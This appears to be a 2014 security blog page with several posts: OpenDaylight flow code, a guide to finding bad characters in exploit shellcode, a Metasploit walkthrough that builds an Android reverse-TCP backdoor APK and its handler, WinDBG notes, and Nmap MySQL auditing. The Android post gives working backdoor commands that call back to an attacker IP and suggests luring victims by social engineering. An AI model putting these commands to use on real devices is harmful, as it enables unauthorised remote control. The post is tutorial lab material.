Friday, April 25, 2014

Opendayligtht (ODL) Controller: Write Flow entries into the Switch Programmatically

public void addAllFlowsToSwitch(List afc, NodeBuilder nodeBuilder) {
        /*
         ActionBuilder > list > ApplyActionsBuilder > ApplyActionsCaseBuilder > InstructionBuilder > list > InstructionsBuilder > flowBuilder
         */
        for(Flow flow : afc) {
            if (flow != null) {
                System.out.println("Adding Flow=" + flow.toString());

                FlowBuilder ffb = new FlowBuilder();
                ffb.fieldsFrom(flow);

                //ffb.setTableId(flow.getTableId());

                ffb.setTableId((short)0x8);
                ffb.setCookie(BigInteger.valueOf(0x8));

                if(flow.getId() != null) {
                    //ffb.setId(new FlowId(flow.getId().getValue()));
                    ffb.setId(new FlowId("1234"));
                }
                //FlowKey fkey = new FlowKey(new FlowId(flow.getId().getValue()));
                FlowKey fkey = new FlowKey(new FlowId("1234"));
                ffb.setKey(fkey);

                DataModification, DataObject> modification = dataBrokerService.beginTransaction();

                //System.out.println("addAllFlowsToSwitch: tid=" + ffb.getTableId() + "fc= " + ffb.getCookie() + "fkey=" + ffb.getKey().toString());

                InstanceIdentifier flowRef = InstanceIdentifier.builder(Nodes.class)
                    .child(Node.class, nodeBuilder.getKey()).augmentation(FlowCapableNode.class)
                    .child(Table.class, new TableKey(ffb.getTableId())).child(Flow.class, ffb.getKey()).build();
                modification.putConfigurationData(nodeBuilderToInstanceId(nodeBuilder), nodeBuilder.build());
                modification.putConfigurationData(flowRef, ffb.build());

                Future> commitFuture = modification.commit();
                try {
                    RpcResult result = commitFuture.get();
                    TransactionStatus status = result.getResult();

                } catch (InterruptedException e) {
                    LOG.error(e.getMessage(), e);
                } catch (ExecutionException e) {
                    LOG.error(e.getMessage(), e);
                }
            }
        }
    }
We are using two-phase commit procedure to write Flows onto Switches.

Opendayligtht (ODL) Controller: Read all Flow entries from the Controller's Cache

    public List getAllControllerFlows(NodeBuilder tn) {
        List coFlows = new ArrayList();

        DataModification, DataObject> cmodification = dataBrokerService.beginTransaction();

        short tablesAmount = 64;
        String nextArgument = "";

        System.out.println("Getting all Flow Entries present on Controller");
        for (short tableId = 0; tableId < tablesAmount; tableId++) {
            InstanceIdentifier pathToControllerTable = InstanceIdentifier.builder(Nodes.class)
                        .child(Node.class, tn.getKey()).augmentation(FlowCapableNode.class)
                        .child(Table.class, new TableKey(tableId)).build();
            Table ctbl = (Table) cmodification.readConfigurationData(pathToControllerTable);
            if (ctbl != null) {
                for (Flow flow : ctbl.getFlow()) {
                    if(flow != null) {
                        coFlows.add(flow);
                        //LOG.info("getAllFlows: flow {}=", flow);
                        System.out.println("=======================================");
                        System.out.println("getAllCFlows: flow= " + flow.toString());
                    }
                }
            }
        }
        System.out.println("=======================================");
        return coFlows;
    }

 To read Flow entries from Switch  http://blog.disects.com/2014/04/opendayligtht-odl-controller-read-all.html

Opendayligtht (ODL) Controller: Read all Flow entries from the Switches

 public List getAllSwitchFlows(NodeBuilder tn) {
        List swFlows = new ArrayList();

        DataModification, DataObject> smodification = dataBrokerService.beginTransaction();

        short tablesAmount = 64;
        String nextArgument = "";

        System.out.println("Getting all Flow Entries present on Switch");
        for (short tableId = 0; tableId < tablesAmount; tableId++) {
            InstanceIdentifier pathToSwitchTable = InstanceIdentifier.builder(Nodes.class)
                        .child(Node.class, tn.getKey()).augmentation(FlowCapableNode.class)
                        .child(Table.class, new TableKey(tableId)).build();
            Table stbl = (Table) smodification.readOperationalData(pathToSwitchTable);
            if (stbl != null) {
                for (Flow flow : stbl.getFlow()) {
                    if(flow != null) {
                        swFlows.add(flow);
                        //LOG.info("getAllFlows: flow {}=", flow);
                        System.out.println("=======================================");
                        System.out.println("getAllSFlows: flow= " + flow.toString());
                    }
                }
            }
        }
        System.out.println("=======================================");
        return swFlows;
    }

Friday, April 18, 2014

Exploitation: Identifying Bad Characters in a Shellcode

Characters which breaks the execution of a Shell code might be considered as Bad Characters.

Before delving deep, we should understand what Shellcode is
http://en.wikipedia.org/wiki/Shellcode

To find out what are the bad characters for the specific application which we are trying to exploit, generate a byte array between 0x00 and 0xff which can be done using Immunity Debugger
!mona bytearray

Copy the generated Byte Array as part of the shell code i.e. after the NOP (\x90) sled. Exploit the Vulnerable application and at the time of crash see the alignment of the Byte Array. If there is an alignment issue at some byte or some missing byte between 0x00 and 0xff is the Bad Characters. Once we find the  Bad Character remove the character from the byte array and try to exploit the application with new shellcode. Repeat the step till 0xff is reached.

Common Bad Characters
0x00    NULL (\0)
0x09     Tab (\t)
0x0a     Line Feed (\n)
0x0d    Carriage Return (\r)
0xff      Form Feed (\f)

Wrote small program to generate Hex Numbers
******************************************
 root@kali-arpman:~# cat hex_numbers.c
#include //use stdio.h and stdlib.h, some html embedding issue
#include

void main()
{
    int x=0,i;

    printf("disects: Generate 0x00 to 0xff Hex Numbers\n");
    for(i = 0;i<=255; i++)
    {
        if(i%8 == 0 && i>=8)
            printf("\n");

        printf("%#.2x  ", i);
    }

    printf("\n");
}
root@kali-arpman:~# gcc hex_numbers.c -o hex_numbers
root@kali-arpman:~#
root@kali-arpman:~#
root@kali-arpman:~# ./hex_numbers
disects: Generate 0x00 to 0xff Hex Numbers
00  0x01  0x02  0x03  0x04  0x05  0x06  0x07
0x08  0x09  0x0a  0x0b  0x0c  0x0d  0x0e  0x0f
0x10  0x11  0x12  0x13  0x14  0x15  0x16  0x17
0x18  0x19  0x1a  0x1b  0x1c  0x1d  0x1e  0x1f
0x20  0x21  0x22  0x23  0x24  0x25  0x26  0x27
0x28  0x29  0x2a  0x2b  0x2c  0x2d  0x2e  0x2f
0x30  0x31  0x32  0x33  0x34  0x35  0x36  0x37
0x38  0x39  0x3a  0x3b  0x3c  0x3d  0x3e  0x3f
0x40  0x41  0x42  0x43  0x44  0x45  0x46  0x47
0x48  0x49  0x4a  0x4b  0x4c  0x4d  0x4e  0x4f
0x50  0x51  0x52  0x53  0x54  0x55  0x56  0x57
0x58  0x59  0x5a  0x5b  0x5c  0x5d  0x5e  0x5f
0x60  0x61  0x62  0x63  0x64  0x65  0x66  0x67
0x68  0x69  0x6a  0x6b  0x6c  0x6d  0x6e  0x6f
0x70  0x71  0x72  0x73  0x74  0x75  0x76  0x77
0x78  0x79  0x7a  0x7b  0x7c  0x7d  0x7e  0x7f
0x80  0x81  0x82  0x83  0x84  0x85  0x86  0x87
0x88  0x89  0x8a  0x8b  0x8c  0x8d  0x8e  0x8f
0x90  0x91  0x92  0x93  0x94  0x95  0x96  0x97
0x98  0x99  0x9a  0x9b  0x9c  0x9d  0x9e  0x9f
0xa0  0xa1  0xa2  0xa3  0xa4  0xa5  0xa6  0xa7
0xa8  0xa9  0xaa  0xab  0xac  0xad  0xae  0xaf
0xb0  0xb1  0xb2  0xb3  0xb4  0xb5  0xb6  0xb7
0xb8  0xb9  0xba  0xbb  0xbc  0xbd  0xbe  0xbf
0xc0  0xc1  0xc2  0xc3  0xc4  0xc5  0xc6  0xc7
0xc8  0xc9  0xca  0xcb  0xcc  0xcd  0xce  0xcf
0xd0  0xd1  0xd2  0xd3  0xd4  0xd5  0xd6  0xd7
0xd8  0xd9  0xda  0xdb  0xdc  0xdd  0xde  0xdf
0xe0  0xe1  0xe2  0xe3  0xe4  0xe5  0xe6  0xe7
0xe8  0xe9  0xea  0xeb  0xec  0xed  0xee  0xef
0xf0  0xf1  0xf2  0xf3  0xf4  0xf5  0xf6  0xf7
0xf8  0xf9  0xfa  0xfb  0xfc  0xfd  0xfe  0xff
root@kali-arpman:~#

******************************************

When testing an application append 0x01-0xff part of the buffer leading to crash, once the application crashes observe the characters
0:000> d 0013e0e0
0013e0e0  cc eb 10 90 71 47 01 10-01 02 03 04 05 06 07 08  ....qG..........
0013e0f0  09 0a 0b 0c 0d 0e 0f 10-11 12 13 14 15 16 17 18  ................
0013e100  19 1a 1b 1c 1d 1e 1f 20-21 22 23 24 25 26 27 28  ....... !"#$%&'(
0013e110  29 2a 2b 2c 2d 2e 2f 30-31 32 33 34 35 36 37 38  )*+,-./012345678
0013e120  39 3a 3b 3c 3d 3e 3f 40-41 42 43 44 45 46 47 48  9:;<=>?@ABCDEFGH
0013e130  49 4a 4b 4c 4d 4e 4f 50-51 52 53 54 55 56 57 58  IJKLMNOPQRSTUVWX
0013e140  59 5a 5b 5c 5d 5e 5f 60-61 62 63 64 65 66 67 68  YZ[\]^_`abcdefgh
0013e150  69 6a 6b 6c 6d 6e 6f 70-71 72 73 74 75 76 77 78  ijklmnopqrstuvwx
0013e160  79 7a 7b 7c 7d 7e 7f 3f-81 3f 3f 3f 3f 3f 3f 3f  yz{|}~.?.???????
0013e170  3f 3f 3f 3f 8d 3f 8f 90-3f 3f 3f 3f 3f 3f 3f 3f  ????.?..????????
0013e180  3f 3f 3f 3f 9d 3f 3f a0-a1 a2 a3 a4 a5 a6 a7 a8  ????.??.........
0013e190  a9 aa ab ac ad ae af b0-b1 b2 b3 b4 b5 b6 b7 b8  ................
0013e1a0  b9 ba bb bc bd be bf c0-c1 c2 c3 c4 c5 c6 c7 c8  ................
0013e1b0  c9 ca cb cc cd ce cf d0-d1 d2 d3 d4 d5 d6 d7 d8  ................
0013e1c0  d9 da db dc dd de df e0-e1 e2 e3 e4 e5 e6 e7 e8  ................
0013e1d0  e9 ea eb ec ed ee ef f0-f1 f2 f3 f4 f5 f6 f7 f8  ................
0013e1e0  f9 fa fb fc fd fe ff 90-90 90 90 90 90 90 90 90  ................
0013e1f0  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0013e200  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0013e210  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0013e220  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0013e230  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................

If we observe carefully characters 0x80,0x82 to 0x8e, 0x91 to 0x9c, 0x9e and 0x9f are probable bad characters. One of the exploit I wrote didn't work if the shellcode has above charactsrs.
http://blog.disects.com/2015/03/webgate-edvr-manager.html

Other References
http://seclists.org/basics/2011/Mar/77
http://www.offensive-security.com/metasploit-unleashed/Generating_Payloads

Other interesting posts on the blog
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2014/04/nmap-scripting-engine-auditing-mysql.html

Saturday, April 12, 2014

Hacking Android devices using Metasploit Backdoor

In this post we will see how to use backdoors generated by Metasploit to gain access into Android devices. I am using Nexux 7 Tablet as Victim.

SETUP DESCRIPTION
192.168.1.102 Victims IP Address (Android Nexus 7 Tablet)
192.168.1.140 Attackers IP Address (Metasploit)

I am using AirDroid App on Nexus 7 to download Metasploit backdoor (say, malicious App). In real scenarios we can host Web server with malicious app and entice users to install the app using various Social Engineering techniques.

BACKDOOR CREATION
Using Kali Linux with Metasploit Framework installed to generate the payload.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=4488 R > andr_bd.apk
msfpayload Metasploit command to create payloads (exe, java, apk etc.)
LHOST (local host) Attackers IP address for victim to connect back
LPORT (local port) port for victim to connect back
R msfpayload parameter indicates generation of raw payload
APK Application Package file

Successful execution of msfpayload will create andr_bd.apk App which is a Metasploit reverse TCP backdoor. When the app is installed on any android device, it will connect back to attackers IP address (192.168.1.140 here). Copy the App to Nexus 7 Tablet using AirDroid, install the app, successful installation will show the screen shot given below.

Before installing the App on Nexus 7 attacker need to run the following Metasploit commands for successful connection back of victim’s machine to attacker’s machine.
$ msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT
msf exploit(handler) > exploit 

We successfully got Metasploit’s meterpreter shell.

Post exploitation commands

Full paper can be accessed from
http://disects.com/whitepapers/Hacking_Android_devices_using_Metasploit_backdoors.pdf

Following articles might be of interest
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Saturday, April 5, 2014

WinDBG: Useful Debugging Commands

Open "Debugging Tools for Windows" help file
0:017> .hh

Display registers
0:017> r

Display Current Process
0:017> |.
0:017> |
Unassemble Function or address 0:017> uf mshtml!CElement::Doc 0:017> u address Assemble Address 0:017> a address Stack Trace 0:017> knL

Display Stack Backtrace
0:017> k
Trace (t) command executes a single instruction or source line and optionally displays the resulting values of all registers and flags. 0:017> t

Set break point
0:017> bp address

List break points
0:017> bl

Search for a String
0:017> s -a 0x00000000 L?7fffffff "disects"

dll is loaded between 03b10000 and 03fd000, search this area for 5d c3
0:014> s 03b10000 l 03fdd000 5d c3

On Intel machines, looking at the disassembled SEH code, you will see an instruction to move DWORD ptr from FS:[0]. This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the
application/thread may not have exception handling at all.
Dump the TEB
0:017> d fs:[0]

Displays the current exception handler chain
0:017> !exchain

Display information about a local variable, global variable or data types(structures and unions). 
0:017> dt var1

array(arr1) under var1
0:017> dt var1 -a arr1

displays all types and globals under nt
0:017> dt nt!*

Looking at the default process heap, shows percentage of busy blocks
0:017> !heap -stat -h 00150000

Listing allocations with specific size
0:017> !heap -flt s fffe0

Display data at an address or a register
0:017> d 03694024-10
0:017> d esp
To which heap entry a particular address (here, 0c0c0c0c) belongs to 0:017> !heap -p -a 0c0c0c0c

Refer blow link for further reference
http://windbg.info/doc/1-common-cmds.html

Thursday, April 3, 2014

Nmap Scripting Engine: Auditing MySQL Server

Nmap is an Open Source tool for Network Mapping, Network Inventory and Security Auditing. Nmap uses raw IP packets to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
 
MySQL is an Open Source Relational Data Base Management Systems (RDBMS).
 
I am using Nmap TCP SYN scan to find all open ports.
 
Nmap Scripts are located at
/usr/share/nmap/scripts
on Kali Linux.
 
Below snapshot shows the scripts we used to audit MySQL Server. Nmap Script disclose critical information like username, usernames without password. cersion, dump of hashes etc.

 
To run all the scripts related to MySQL execute below command.
# nmap --script "mysql-*" target_ip
 
From the above snapshots replace 127.0.0.1 with the IP you want to scan/audit.